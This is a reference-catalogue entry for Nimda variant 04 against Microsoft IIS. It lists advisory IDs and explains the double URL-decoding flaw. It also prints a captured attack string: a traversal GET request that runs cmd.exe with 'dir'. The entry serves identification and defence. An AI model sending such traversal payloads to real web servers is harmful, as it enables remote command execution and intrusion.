Nimda, variant 04

Against

IIS on Windows

IDs

Bugtraq: 2708
Microsoft: MS01-020
CERT-Advisory: CA-2001-26
CERT-Vuln: 111677
CVE: CAN-2001-0333

Category

URL decoding error

Effect

Remote access

Source

Captured with snort

Description

A URI (RFC 2396) has a limited set of allowed characters. Since this set is smaller than the set of allowable characters in filenames, the standard allows for encoding of special characters with &37; followed by the hex value of the character.

The flaw was that IIS decoded some of the input twice. IIS checks the path for security after the first decoding, but it is the second deconding that controls the file actually accessed.

NSFocus has a good description of the flaw. CERT claims they found the flaw.

Nimda had several other transmission methods not involving web servers.

Nimda had at least 18 variants it used.

Attack string

GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

Attack program source

None available.